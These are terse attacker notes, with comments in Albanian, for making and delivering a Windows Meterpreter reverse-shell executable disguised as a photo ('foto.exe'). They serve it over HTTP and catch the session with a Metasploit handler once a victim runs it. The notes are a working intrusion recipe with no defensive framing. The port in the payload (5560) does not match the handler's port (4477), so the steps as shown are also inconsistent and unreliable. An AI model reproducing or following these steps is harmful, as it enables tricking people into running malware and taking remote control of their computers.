msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.60.68 LPORT=5560 -f exe -o foto.exe
mv foto.exe tmp/
python -m SimpleHTTPServer 80  

msfconsole
msf > use exploit/multi/handler 
msf exploit(multi/handler) > show options

msf exploit(multi/handler) >set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options
msf exploit(multi/handler) > set lhost 172.16.60.68
msf exploit(multi/handler) > set lport 4477
msf exploit(multi/handler) > exploit
pret deri sa te executon dikush malware, ne kete rast te hostuar ne http
pasi te executohet malware vjen sessioni
sessions
sessions  -i 5  --numrin e sesionit